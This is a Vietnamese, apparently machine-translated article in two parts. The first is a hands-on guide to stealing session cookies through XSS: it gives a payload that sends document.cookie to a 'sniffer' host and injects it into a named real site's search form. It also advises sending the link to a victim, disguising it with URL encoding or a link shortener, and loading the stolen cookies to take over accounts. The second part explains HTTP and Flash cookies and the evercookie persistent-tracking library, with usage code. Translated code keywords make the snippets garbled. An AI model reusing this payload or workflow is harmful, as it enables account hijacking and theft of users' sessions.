    Để đánh cắp cookie, chúng tôi cần một trình thám thính web, bạn có thể cài đặt một số loại trình thám thính trên máy chủ của mình hoặc bạn có thể sử dụng trình thám thính trực tuyến, hiện có rất nhiều trình thám thính.
    Để đánh cắp cookie thông qua XSS thụ động, nạn nhân phải đi theo một liên kết độc hại. Để đánh cắp cookie, chúng tôi sẽ sử dụng tập lệnh khác thay vì cảnh báo ('xss'):
    img = Hình ảnh mới();


    chúng tôi thay thế đoạn mã vào liên kết và để nạn nhân theo dõi nó, nhìn vào nhật ký của kẻ đánh hơi và vui mừng.
    Hãy xem một ví dụ.
    Hãy lấy XSS đó trên Rambler từ đoạn trước.
    Chèn
    ">
    img = Hình ảnh mới();
    img.src = "địa chỉ hình ảnh đánh hơi"+document.cookie;

    trong biểu mẫu tìm kiếm, nhấp vào “tìm”, nhìn vào thanh địa chỉ và thấy:

    http://miss.rambler.ru/srch/?sort=0& … &words =">
    Chúng tôi gửi liên kết này cho nạn nhân và thưởng thức cookie.
    Nhìn thấy link như vậy, nạn nhân có thể nghi ngờ điều gì đó nên nên mã hóa
    ">img = Hình ảnh mới();img.src = "địa chỉ hình ảnh đánh hơi"+document.cookie;
    trong URL Hoặc sử dụng các dịch vụ như http://tinyurl.com/
    Hãy chuyển sang active XSS, mọi thứ ở đây đều đơn giản, thay vì notification() chúng ta chèn img = new Image();img.src = "address of the sniffer image"+document.cookie;

    Bây giờ chúng tôi có cookie. Nhưng phải làm gì với chúng? Rất đơn giản, bạn cần thay thế chúng thay vì của riêng bạn. Trình duyệt Opera có trình chỉnh sửa cookie tích hợp (công cụ->nâng cao->quản lý cookie), có một plugin cho Firefox (Tôi không nhớ nó gọi là gì, hãy sử dụng Google)
    Tạm thời thế thôi, có lẽ bài viết sẽ bổ sung thêm

    Cookie là công nghệ cho phép trang web “ghi nhớ” người dùng,
    lưu cài đặt của anh ấy và không yêu cầu anh ấy đăng nhập và mật khẩu mỗi lần. Có thể
    nghĩ rằng nếu bạn xóa cookie trong trình duyệt của mình, trang web sẽ không nhận ra bạn. Nhưng cái này
    Sự tự tin là lừa dối.

    Bạn có thể lo lắng về tính ẩn danh của mình bao nhiêu tùy thích, hãy sử dụng proxy
    và VPN, giả mạo các tiêu đề yêu cầu HTTP tiết lộ hệ thống đang được sử dụng,
    phiên bản trình duyệt, múi giờ và rất nhiều thông tin khác nhưng website không quan tâm
    Vẫn sẽ có cách để nhận ra sự thật là bạn đã từng ở đó. Ở nhiều nơi
    trong những trường hợp điều này không đặc biệt quan trọng, nhưng không phải trong tình huống mà tại một thời điểm nào đó
    dịch vụ bạn cần để giới thiệu mình là người dùng khác hoặc đơn giản là lưu
    sự ẩn danh. Thật dễ dàng để tưởng tượng hệ thống chống gian lận của một số loại hình thông thường
    tổ chức tài chính, nếu xác định rằng các giao dịch được thực hiện từ một máy tính
    ủy quyền theo tài khoản của những người hoàn toàn khác nhau. Và nó không đẹp sao?
    nhận ra rằng ai đó trên Internet có thể theo dõi chuyển động của bạn? Khắc nghiệt. Nhưng
    những điều đầu tiên đầu tiên.

    Cookie hoạt động như thế nào?

    Cookie đã được sử dụng trong nhiều thế kỷ để nhận dạng người dùng.
    Cookie (từ "cookie" tiếng Anh") là một đoạn thông tin văn bản nhỏ,
    mà máy chủ chuyển tới trình duyệt. Khi người dùng truy cập vào máy chủ
    (nhập địa chỉ của nó vào dòng trình duyệt), máy chủ có thể đọc thông tin,
    có trong cookie và dựa trên phân tích của nó, thực hiện bất kỳ hành động nào.
    Ví dụ: trong trường hợp có quyền truy cập được ủy quyền vào nội dung nào đó qua web trong cookie
    thông tin đăng nhập và mật khẩu được lưu trong phiên, cho phép người dùng không
    nhập lại chúng khi được nhắc đối với từng tài liệu được bảo vệ bằng mật khẩu. Vì thế
    Bằng cách này, trang web có thể "ghi nhớ" người dùng. Về mặt kỹ thuật có vẻ như
    theo cách sau. Khi yêu cầu một trang, trình duyệt sẽ gửi một thông báo ngắn
    Văn bản yêu cầu HTTP.

    Ví dụ: để truy cập trang www.example.org/index.html trình duyệt
    gửi yêu cầu sau đến máy chủ www.example.org:

    NHẬN /index.html HTTP/1.1
    Máy chủ: www.example.org

    Máy chủ phản hồi bằng cách gửi trang được yêu cầu cùng với văn bản,
    chứa phản hồi HTTP. Điều này có thể hướng dẫn trình duyệt lưu cookie:

    HTTP/1.1 200 Được
    Loại nội dung: văn bản/html
    Đặt-Cookie: tên=giá trị

    Nếu có dòng Set-cookie thì trình duyệt sẽ ghi nhớ dòng name=value (name =
    value) và gửi nó trở lại máy chủ với mỗi yêu cầu tiếp theo:

    NHẬN /spec.html HTTP/1.1
    Máy chủ: www.example.org
    Cookie: tên=giá trị
    Chấp nhận: */*

    Mọi thứ đều rất đơn giản. Nếu máy chủ nhận được cookie từ máy khách và có chúng trong
    cơ sở dữ liệu, anh ấy chắc chắn có thể xử lý chúng. Vì vậy, nếu đó là cookie với
    người dùng sẽ không có một số thông tin về ủy quyền tại thời điểm truy cập
    bạn sẽ được yêu cầu đăng nhập và mật khẩu. Theo tiêu chuẩn thì cookie có tuổi thọ nhất định
    (mặc dù nó có thể rất lớn), sau đó họ chết. Và bất kỳ
    người dùng có thể dễ dàng xóa cookie đã lưu bằng cách sử dụng
    tùy chọn tương ứng, có sẵn trong bất kỳ trình duyệt nào. Thực tế này rất
    làm phiền lòng chủ sở hữu của nhiều tài nguyên không muốn mất liên lạc
    khách thăm quan. Điều quan trọng là họ phải theo dõi anh ta, hiểu rằng “người này đã ở cùng chúng tôi
    hôm qua và ngày hôm kia, v.v." Điều này đặc biệt đúng đối với các máy phân tích khác nhau
    lưu lượng truy cập, hệ thống duy trì số liệu thống kê, mạng biểu ngữ, v.v. Đây là đâu
    niềm vui bắt đầu, bởi vì các nhà phát triển sử dụng tất cả các loại
    những thủ thuật mà nhiều người dùng thậm chí không hề biết. Họ đang di chuyển
    thủ đoạn khác nhau.

    Cookie flash

    Vấn đề là ngoài những “quà tặng” HTTP thông thường mà mọi người đã quan tâm từ lâu
    đã quen với nó, bây giờ các kho lưu trữ thay thế đang được sử dụng tích cực, nơi trình duyệt
    có thể ghi dữ liệu về phía khách hàng. Điều đầu tiên phải kể đến là
    lưu trữ những gì bạn yêu thích và ghét cùng một lúc Flash (dành cho những người dùng
    mà nó được cài đặt). Dữ liệu được lưu trữ trong cái gọi là LSO (Local Shared
    Objects) - các tệp có định dạng tương tự như cookie được lưu cục bộ trên
    máy tính của người dùng. Cách tiếp cận này về nhiều mặt tương tự như những "món quà" thông thường (trong trường hợp này
    trường hợp, một lượng nhỏ cũng được lưu trữ trên máy tính của người dùng.
    dữ liệu văn bản), nhưng có một số lợi thế:

    • Cookie flash phổ biến cho tất cả các trình duyệt trên máy tính (không giống như
      từ cookie cổ điển được gắn với trình duyệt). Cài đặt, thông tin
      về phiên, chẳng hạn như một số mã định danh để theo dõi người dùng,
      không bị ràng buộc với bất kỳ trình duyệt cụ thể nào, nhưng trở nên phổ biến đối với
      mọi người.
    • Cookie flash cho phép bạn lưu trữ nhiều dữ liệu hơn (như
      thường là 100 KB), làm tăng số lượng cài đặt của người dùng,
      có sẵn để lưu.

    Trong thực tế, LSO trở thành một công nghệ theo dõi rất đơn giản và dễ tiếp cận
    người dùng. Hãy suy nghĩ về điều này: nếu tôi đề nghị bạn loại bỏ tất cả những “quà tặng” trong
    hệ thống, bạn có nhớ về Flash cookie không? Chắc là không. Bây giờ hãy thử lấy
    bất kỳ người xem nào, ví dụ, miễn phí

    FlashCookiesXem và xem có bao nhiêu điều thú vị được ghi lại trong
    Kho lưu trữ flash. Danh sách các trang web thực sự không muốn
    mất dấu vết của bạn, ngay cả khi bạn xóa bộ nhớ cache của trình duyệt (cùng với các tính năng bổ sung).

    Cookie ở mọi nơi với evercookie

    Nhưng nếu người dùng nâng cao và thậm chí ít nhiều người dùng giỏi đã nghe nói về LSO
    các nhà phát triển, thì sự tồn tại của các kỹ thuật lưu trữ dữ liệu khác, đôi khi rất
    tinh vi (nhưng hiệu quả), nhiều người thậm chí không nghi ngờ. Ít nhất hãy lấy cái mới
    kho lưu trữ xuất hiện trong
    (Lưu trữ phiên,
    Lưu trữ cục bộ, Lưu trữ toàn cầu, Lưu trữ cơ sở dữ liệu qua SQLite), mà bạn có thể
    đọc trong bài viết "". Một chuyên gia người Ba Lan đã bối rối nghiêm trọng trước vấn đề này
    về an toàn Samy Kamkar. Kết quả là, một điều đặc biệt
    Thư viện Evercookie JavaScript, được thiết kế đặc biệt để
    tạo cookie bền nhất trong trình duyệt. Có người sẽ hỏi: “Tại sao
    điều này có cần thiết không?" Rất đơn giản: để nhận dạng duy nhất
    khách truy cập trang nếu anh ta quay lại. Những cookie khó tiêu diệt như vậy thường
    được gọi là Cookie theo dõi và thậm chí còn bị một số phần mềm chống vi-rút phát hiện dưới dạng
    mối đe dọa đến quyền riêng tư. Evercookie có thể giảm thiểu mọi nỗ lực ẩn danh
    số không.

    Bí mật là evercookie sử dụng mọi thứ có sẵn trên trình duyệt cùng một lúc
    lưu trữ: cookie HTTP thông thường, vùng chứa LSO, HTML5. Ngoài ra, nó còn có tác dụng
    một số thủ đoạn xảo quyệt, với thành công không kém, cho phép bạn rời đi
    máy tính đạt được điểm mong muốn. Trong số đó: tạo ra các hình ảnh PNG đặc biệt,
    sử dụng trình duyệt lịch sử, lưu trữ dữ liệu bằng thẻ ETag, container
    userData trong Internet Explorer - hóa ra có rất nhiều tùy chọn.

    Bạn có thể thấy tính năng này hoạt động hiệu quả như thế nào trên trang web.
    nhà phát triển -
    http://samy.pl/evercookie. Nếu bạn bấm vào nút "Nhấp để tạo một
    evercookie", các cookie có số ngẫu nhiên sẽ được tạo trong trình duyệt. Hãy dùng thử
    xóa cookie bất cứ khi nào có thể. Tôi cá bây giờ bạn
    Tôi nghĩ: “Tôi có thể xóa cookie ở đâu khác, ngoại trừ trong cài đặt trình duyệt?”
    Bạn có chắc chắn đã xóa mọi thứ? Tải lại trang để chắc chắn, thậm chí bạn có thể làm lại
    mở trình duyệt. Bây giờ, vui lòng nhấp vào nút “Nhấp để khám phá lại cookie”.
    WTF? Điều này không ngăn trang web lấy dữ liệu từ đâu đó - trong các trường trang
    số đã được lưu trong cookie đã được hiển thị. Nhưng chúng ta đã chà xát chúng chưa? Làm sao
    nó có hoạt động không? Hãy cố gắng hiểu một số kỹ thuật.

    Cookie ở dạng PNG

    Một kỹ thuật cực kỳ thú vị được sử dụng trong Evercookie là cách tiếp cận
    lưu trữ dữ liệu trong hình ảnh PNG được lưu trữ. Khi evercookie được đặt
    cookie, nó truy cập vào tập lệnh evercookie_png.php bằng một “bun” HTTP đặc biệt.
    khác với thông tin được sử dụng để lưu trữ thông tin tiêu chuẩn về
    phiên. Những cookie đặc biệt này được đọc bởi một tập lệnh PHP tạo ra
    Hình ảnh PNG trong đó tất cả các giá trị RGB (màu) được đặt theo
    với thông tin về phiên. Cuối cùng, tệp PNG được gửi đến trình duyệt của khách hàng
    với ghi chú: “tệp phải được lưu trữ trong 20 năm.”

    Sau khi nhận được dữ liệu này, evercookie sẽ xóa thông tin đặc biệt đã tạo trước đó
    Các cookie HTTP sau đó thực hiện cùng một yêu cầu đối với cùng một tập lệnh PHP, nhưng không
    cung cấp thông tin về người dùng. Anh ta thấy rằng dữ liệu anh ta quan tâm
    không, và nó không thể tạo PNG. Thay vào đó, trình duyệt trả về
    phản hồi HTTP giả mạo "304 Not Modified" khiến nó kéo tệp từ
    bộ đệm cục bộ. Hình ảnh từ bộ đệm được chèn vào trang bằng thẻ
    Canvas HTML5. Khi điều này xảy ra, evercookie sẽ đọc từng pixel
    Nội dung canvas, trích xuất các giá trị RGB và do đó khôi phục
    dữ liệu cookie ban đầu được lưu trữ trong hình ảnh. Thì đấy, thế thôi
    làm.

    Gợi ý với Lịch sử web

    Một kỹ thuật khác sử dụng trực tiếp lịch sử trình duyệt. Một khi trình duyệt
    cài đặt bun, evercookie mã hóa dữ liệu bằng thuật toán Base64,
    những gì cần được bảo tồn. Giả sử rằng dữ liệu này là một chuỗi,
    kết quả "bcde" sau khi chuyển đổi sang Base64. Thư viện tuần tự
    truy cập các URL sau trong nền:

    google.com/evercookie/cache/b
    google.com/evercookie/cache/bc
    google.com/evercookie/cache/bcd
    google.com/evercookie/cache/bcde
    google.com/evercookie/cache/bcde-

    Vì vậy các URL này đều được lưu vào lịch sử. Tiếp theo là phần đặc biệt
    kỹ thuật - CSS History Knocker, sử dụng tập lệnh JS và CSS, cho phép
    kiểm tra xem người dùng có truy cập tài nguyên được chỉ định hay không (chi tiết hơn tại đây -
    samy.pl/csshack). Vì
    kiểm tra bánh bao evercookie chạy qua tất cả các ký tự Base64 có thể có trên
    google.com/evercookie/cache, bắt đầu bằng ký tự "a" và tiếp tục, nhưng chỉ
    cho một nhân vật. Khi tập lệnh nhìn thấy URL đã được truy cập, nó
    bắt đầu tìm kiếm ký tự tiếp theo. Hóa ra đó là một loại vũ lực. Trong thực tế
    Việc lựa chọn này được thực hiện cực kỳ nhanh chóng vì không có yêu cầu nào
    máy chủ không được thực thi. Tìm kiếm trong lịch sử được thực hiện cục bộ nhất có thể
    thời gian ngắn. Thư viện biết rằng nó đã đến cuối dòng khi URL được
    kết thúc bằng ký hiệu “-”. Chúng tôi giải mã Base64 và lấy dữ liệu của mình. Làm sao
    tên nhà phát triển trình duyệt cho phép điều này?

    Hãy thử xóa

    Điều gì xảy ra nếu người dùng xóa cookie của mình? Một tính năng quan trọng của thư viện
    evercookie là người dùng sẽ phải cố gắng hết sức để
    xóa cookie còn sót lại ở những nơi khác nhau - hiện có 10 cookie nếu ở ít nhất một.
    Nếu dữ liệu cookie vẫn còn nguyên, nó sẽ tự động được khôi phục ở tất cả các
    địa điểm. Ví dụ: nếu người dùng không chỉ xóa cookie tiêu chuẩn của mình mà còn
    và xóa dữ liệu LSO, dọn dẹp kho lưu trữ HTML5, dù sao thì điều này khó có thể xảy ra
    Các cookie được tạo bằng lịch sử web và PNG được lưu trong bộ nhớ đệm sẽ vẫn còn. Tại
    lần tới khi bạn truy cập một trang web có evercookie, thư viện sẽ không chỉ có thể tìm thấy
    bun ẩn, nhưng cũng sẽ khôi phục chúng ở tất cả những nơi khác
    hỗ trợ trình duyệt máy khách. Một điểm thú vị liên quan đến việc chuyển giao
    "goodies" giữa các trình duyệt. Nếu người dùng nhận được cookie trong một trình duyệt,
    nghĩa là có khả năng cao là chúng sẽ được tái tạo ở những người khác. Điều duy nhất
    một điều kiện cần thiết cho việc này là lưu dữ liệu trong cookie Đối tượng chia sẻ cục bộ.

    Làm thế nào để sử dụng?

    Thư viện Evercookie hoàn toàn mở nên bạn có thể thoải mái
    sử dụng nó và tùy chỉnh nó cho phù hợp với nhu cầu của bạn. Máy chủ không được cung cấp bất kỳ
    yêu cầu nghiêm túc. Tất cả những gì bạn cần là truy cập vào một tập lệnh JS trong đó
    chứa mã evercookie. Để sử dụng Flash cookie (Đối tượng chia sẻ cục bộ),
    phải có tệp evercookie.swf trong thư mục chứa tập lệnh và để kỹ thuật viên làm việc,
    dựa trên bộ nhớ đệm PNG và việc sử dụng bộ lưu trữ ETag, quyền truy cập vào
    Các tập lệnh PHP evercookie_png.php và evercookie_etag.php. Sử dụng evercookie
    Bạn có thể thực hiện việc này trên bất kỳ trang nào của trang web bằng cách kết nối tập lệnh sau:





    var ec = new evercookie();
    // đặt cookie "id" với giá trị "12345"
    // cú pháp: ec.set(key, value)
    ec.set("id", "12345");
    // khôi phục cookie với tên "id"
    ec.get("id", hàm(giá trị)
    {
    cảnh báo("Giá trị cookie là " + value)
    });

    Ngoài ra còn có một cách khác để lấy cookie, dựa trên việc sử dụng nhiều hơn
    chức năng gọi lại nâng cao. Điều này cho phép bạn trích xuất các giá trị cookie từ
    các kho lưu trữ khác nhau được sử dụng và so sánh chúng với nhau:

    hàm getCookie(best_candidate, all_candidates)
    {
    Alert("Cookie được truy xuất là: " + best_candidate + "\n" + "Bạn
    có thể xem mỗi cơ chế lưu trữ trả về những gì " + "bằng cách lặp qua tất cả
    ứng viên phản đối.");

    Đối với (var item trong all_candidates) document.write("Storage
    cơ chế " + item + " trả về: " + all_candidates + "
    ");
    }

    ec.get("id", getCookie);

    Thư viện evercookie có sẵn cho tất cả mọi người. Điều đó hơi đáng sợ, đặc biệt nếu
    Bạn hoàn toàn không biết mình có thể làm gì để chống lại cô ấy.

    Làm thế nào để bảo vệ chính mình?

    Không có vấn đề gì khi xóa cookie trong trình duyệt và Flash nhưng hãy thử.
    xóa dữ liệu ở bất cứ nơi nào evercookie bị bỏ lại! Rốt cuộc, nếu bạn để bánh quy trong một
    địa điểm - tập lệnh sẽ tự động khôi phục giá trị ở tất cả những nơi khác
    kho lưu trữ. Về cơ bản thư viện này là một công cụ kiểm tra chế độ tốt
    quyền riêng tư, điều mà hầu hết các trình duyệt hiện nay đều có. Và đó là điều tôi nói với bạn
    Tôi sẽ nói: từ Google Chrome, Opera, Internet Explorer và Safari, chỉ cái cuối cùng
    Chế độ "Duyệt web riêng tư" đã chặn hoàn toàn tất cả các phương pháp được sử dụng
    evercookie. Tức là sau khi đóng và mở trình duyệt, script không thể
    khôi phục lại giá trị nó để lại. Có lý do để suy nghĩ. Hơn nữa, trong
    sắp tới nhà phát triển evercookie hứa sẽ bổ sung thêm vào thư viện
    một số kỹ thuật lưu trữ dữ liệu, bao gồm cả việc sử dụng công nghệ biệt lập
    Lưu trữ trong Silverlight, cũng như một ứng dụng Java.